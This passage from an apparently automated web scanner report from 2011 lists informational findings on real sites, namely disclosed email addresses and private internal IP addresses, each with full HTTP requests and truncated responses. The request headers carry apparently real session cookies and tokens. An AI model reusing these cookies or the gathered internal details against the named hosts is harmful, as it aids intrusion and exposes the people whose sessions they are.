$4)#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t;s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^A;s
...[SNIP]...
22.14. http://us.havaianas.com/scripts/scriptaculous/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.havaianas.com
Path:   /scripts/scriptaculous/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/scriptaculous/controls.js HTTP/1.1
Host: us.havaianas.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://us.havaianas.com/MYOH.html

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:56:13 GMT
Server: Apache
Last-Modified: Mon, 13 Jun 2011 14:07:37 GMT
ETag: "3fe0724-8834-4df619a9"
Accept-Ranges: bytes
Content-Length: 34868
Content-Type: application/javascript

// script.aculo.us controls.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...
22.15. http://us.havaianas.com/scripts/scriptaculous/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.havaianas.com
Path:   /scripts/scriptaculous/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/scriptaculous/dragdrop.js HTTP/1.1
Host: us.havaianas.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://us.havaianas.com/MYOH.html

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:56:13 GMT
Server: Apache
Last-Modified: Mon, 13 Jun 2011 14:07:37 GMT
ETag: "3fe0725-7b75-4df619a9"
Accept-Ranges: bytes
Content-Length: 31605
Content-Type: application/javascript

// script.aculo.us dragdrop.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...
22.16. http://videopress.com/osd.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videopress.com
Path:   /osd.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /osd.xml HTTP/1.1
Host: videopress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1394796369-1308011441080

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:32:41 GMT
Content-Type: application/xml
Connection: close
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://videopress.com/xmlrpc.php
Expires: Tue, 14 Jun 2011 05:47:46 +0000
Cache-Control: max-age=86400, public
X-nc: HIT sat 243
Content-Length: 1609

<?xml version="1.0" encoding="UTF-8" ?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
   <ShortName>VideoPress News</ShortN
...[SNIP]...
<Contact>support@wordpress.com</Contact>
...[SNIP]...
22.17. http://widgets3.flux.com/Widget/Comments/3024/en-US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets3.flux.com
Path:   /Widget/Comments/3024/en-US

Issue detail

The following email address was disclosed in the response:

Request

GET /Widget/Comments/3024/en-US HTTP/1.1
Host: widgets3.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Last-Modified: Wed, 09 Dec 2009 10:41:04 GMT
Server: Microsoft-IIS/7.0
Server: w04g3
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg3
Content-Length: 55215
Cache-Control: public, max-age=459
Expires: Tue, 14 Jun 2011 00:34:27 GMT
Date: Tue, 14 Jun 2011 00:26:48 GMT
Connection: close
Vary: Accept-Encoding

Flux.widgets['Comments3024'] = Flux.widgets['Comments3024'] || {};
Flux.widgets['Comments3024'].frameworkVersion = 3007;
Flux.widgets['Comments3024'].controls = {
   "BadgeNotification": 3001,
   "Use
...[SNIP]...
bove": "Please enter the text above",
   "msgEnterValidEmail": "Please enter a valid e-mail",
   "msgExpectedError": "We are unable to complete your action. If you think this is in error, please contact support@flux.com for assistance and reference error code \"{ERROR_CODE}\".",
   "msgFacebookConnectedFlux": "This Facebook account has already been connected with a Flux account.",
   "msgForgotPassword": "Forgot passwo
...[SNIP]...
22.18. http://windows.microsoft.com/Scripts/3.1/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://windows.microsoft.com
Path:   /Scripts/3.1/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Scripts/3.1/s_code.js HTTP/1.1
Host: windows.microsoft.com
Proxy-Connection: keep-alive
Referer: http://windows.microsoft.com/en-US/internet-explorer/products/ie/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; msdn=L=1033; WT_NVR_RU=0=msdn:1=:2=; mcI=Thu, 09 Jun 2011 16:24:17 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=11779L002j13n0002g10103; ixpLightBrowser=0; _vis_opt_s=1%7C; R=200024632-6/4/2011 17:55:19; s_nr=1307360954509-Repeat; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/06/2011 11:52:41&Microsoft.VisitStartDate=06/06/2011 11:52:41&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=23&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1307350365395:ss=1307350365395; Ms.Wol.WindowsEdition=0

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=31536000
Content-Type: text/javascript
Last-Modified: Tue, 21 Sep 2010 08:05:02 GMT
Accept-Ranges: bytes
ETag: "0b37b16359cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
Date: Tue, 14 Jun 2011 00:34:13 GMT
Content-Length: 16449

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="mswindowshelpenusdev"
var s=s_gi(s_account)
/************
...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...
22.19. http://www.mtv.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65
If-None-Match: 728d2711397fbbe1aed2d7d950ac94a3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html
ETag: c38777ea53e9ab59c7afcca9aa8c77a7
Vary: User-Agent
Vary: Accept-Encoding
Cache-Control: max-age=135
Date: Tue, 14 Jun 2011 00:28:43 GMT
Content-Length: 165248
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<m
...[SNIP]...
<a href="mailto:dailyfresh@mtv.com">
...[SNIP]...
22.20. http://www.pega.com/community/groups/pega-developer-network-pdn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pega.com
Path:   /community/groups/pega-developer-network-pdn

Issue detail

The following email address was disclosed in the response:

Request

GET /community/groups/pega-developer-network-pdn HTTP/1.1
Host: www.pega.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.6.10.1308054477; DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
ETag: 1307965167
a: 1:{s:12:"Content-Type";s:24:"text/html; charset=utf-8";}
X-AH-Environment: prod
Content-Length: 40360
Date: Tue, 14 Jun 2011 12:32:26 GMT
X-Varnish: 238983897
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...
<a href="mailto:PDN@Pega.com">PDN@Pega.com</a>
...[SNIP]...
23. Private IP addresses disclosed  previous  next
There are 22 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

23.1. http://static.ak.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; wd=280x80

Response

HTTP/1.1 200 OK
ETag: "4cee9fd4a0927297616c6d703f3dd063"
Vary: Accept-Encoding
X-FB-Server: 10.43.60.53
X-Cnection: close
Content-Type: text/css; charset=utf-8
Content-Length: 14288
Cache-Control: public, max-age=476
Expires: Tue, 14 Jun 2011 00:26:38 GMT
Date: Tue, 14 Jun 2011 00:18:42 GMT
Connection: close

/*1303255882,171370527,JIT Construction: v368160,en_US*/

.FB_UIButton{background-image:url(/images/ui/UIActionButton_ltr.png);border-style:solid;border-width:1px;display:-moz-inline-box;display:inlin
...[SNIP]...
23.2. http://static.ak.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; wd=280x80

Response

HTTP/1.1 200 OK
ETag: "2f4cf6f9e15464f938383b39ea9ec17b"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.54.57.39
X-Cnection: close
Content-Length: 211455
Cache-Control: public, max-age=1050
Expires: Tue, 14 Jun 2011 00:36:03 GMT
Date: Tue, 14 Jun 2011 00:18:33 GMT
Connection: close

/*1307493328,171325735,JIT Construction: v388875,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
23.3. http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; wd=280x80

Response

HTTP/1.1 200 OK
ETag: "ae6dbd6e6e89a77d020c91f1d203905c"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.136.135.115
X-Cnection: close
Content-Length: 18445
Cache-Control: public, max-age=665
Expires: Tue, 14 Jun 2011 00:29:13 GMT
Date: Tue, 14 Jun 2011 00:18:08 GMT
Connection: close

/*1307493243,176719731,JIT Construction: v388875,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
23.4. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df337b746ac%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1cdbf0e3c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.199
X-Cnection: close
Content-Length: 3327
Vary: Accept-Encoding
Cache-Control: public, max-age=1641
Expires: Tue, 14 Jun 2011 00:41:46 GMT
Date: Tue, 14 Jun 2011 00:14:25 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
23.5. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_long.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /images/fbconnect/login-buttons/connect_light_medium_long.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/fbconnect/login-buttons/connect_light_medium_long.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/gif
X-FB-Server: 10.30.148.192
X-Cnection: close
Content-Length: 1734
Cache-Control: max-age=1963218
Expires: Wed, 06 Jul 2011 17:47:26 GMT
Date: Tue, 14 Jun 2011 00:27:08 GMT
Connection: close

GIF89a.....?.;Y....A^.C`.Vq....h..j..f~.az.d|._x.Lg.Rl.[t.Id.B\.w..:S....>Y.Yq.=V.Ia.AX....}........E_.Oh....r.....Sh.............n.....j|.............l.......av....h{..........]r.j..g....n..`x.k..e
...[SNIP]...
23.6. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_small_short.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /images/fbconnect/login-buttons/connect_light_small_short.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/fbconnect/login-buttons/connect_light_small_short.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/gif
X-FB-Server: 10.30.145.199
X-Cnection: close
Content-Length: 361
Cache-Control: max-age=495365
Expires: Sun, 19 Jun 2011 18:02:53 GMT
Date: Tue, 14 Jun 2011 00:26:48 GMT
Connection: close

GIF89a.......;Y.......`y.i..Rm.Ie.Mi.Ql.c|.\v.Fc.C`.f~.Uo....Xr.bz.Zt.\v.Vp.Wq.g.i..Jf.k..e}._w.Sn.Pl....Ea.Tn.........................................................................................
...[SNIP]...
23.7. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jUmyEs5927-.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y9/r/jUmyEs5927-.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y9/r/jUmyEs5927-.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df337b746ac%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1cdbf0e3c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 23 May 2011 17:50:32 GMT
X-FB-Server: 10.138.69.184
Content-Length: 7003
Vary: Accept-Encoding
Cache-Control: public, max-age=29774521
Expires: Wed, 23 May 2012 14:56:22 GMT
Date: Tue, 14 Jun 2011 00:14:21 GMT
Connection: close

/*1306249061,176833976*/

.fbSendButton{display:inline-block}
#LikePluginPagelet .fbSendButton{display:block}
.fbSendButton .btnLink{display:block;white-space:nowrap;line-height:14px}
.fbSendButtonBig
...[SNIP]...
23.8. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/uzHjjRskdHc.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yf/r/uzHjjRskdHc.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yf/r/uzHjjRskdHc.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df337b746ac%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1cdbf0e3c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 08 Jun 2011 07:38:03 GMT
X-FB-Server: 10.138.16.185
Content-Length: 54755
Vary: Accept-Encoding
Cache-Control: public, max-age=31092447
Expires: Thu, 07 Jun 2012 21:01:48 GMT
Date: Tue, 14 Jun 2011 00:14:21 GMT
Connection: close

/*1307566995,176820409*/

if (window.CavalryLogger) { CavalryLogger.start_js(["qEipN"]); }

WindowComm={_callbacks:{},makeHandler:function(a,c){c=c||'opener';var b='f'+(Math.random()*(1<<30)).toString
...[SNIP]...
23.9. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=null&extern=0&channel=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
